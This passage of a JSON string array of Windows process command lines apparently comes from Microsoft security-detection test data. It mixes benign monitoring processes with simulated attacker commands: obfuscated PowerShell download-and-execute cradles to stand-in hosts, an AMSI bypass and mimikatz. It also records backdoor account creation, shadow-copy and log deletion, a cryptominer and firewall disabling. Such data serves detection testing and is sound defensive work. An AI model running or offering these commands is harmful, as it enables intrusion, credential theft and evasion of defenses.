[S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin  delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net  user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator Bob_testing /add\",\"net  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net  use q: /delete\",\"net  share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare /delete\",\"net  user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator /delete\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe  -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd   /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil  -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe  k111\",\"implant.exe  81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe  -b -t -m\",\"cmd  /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net  localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1  localgroup Administrators\",\"whoami\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user Bob1 /domain\",\"net  user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1  group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32  /C ShEll32Control_RanDLL.dll\",\".\\\\reg  query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg  add Image File Execution Options sethc.exe\",\".\\\\ftp  -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net  use v: \\\\\\\\tsclient\\\\c\",\"net  v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1  v: /delete\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg  add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe  /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\"cmd.exe  /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe  -foo\",\".\\\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd  /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe  c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe   firewall set opmode mode=disable profile=all\",\"cmd  /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe   @ abc.com abc.wallet\",\"cmd  /c echo /e:vbscript.encode /b\",\"pcalua.exe  -a \\\\\\\\server\\\\payload.dll\",\"findstr  /si password sysvol *.txt\",\"odbcconf.exe  /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe  /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe  464 0 0x0110:40\",\"mt.exe  port\",\"mt.exe  smb\",\"hd.exe  -pslist\",\"hd.exe  -enum\",\"netsh.exe  PortOpenning\",\"certutil  -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg  add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg  delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc  create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc  delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd  /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe   add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring 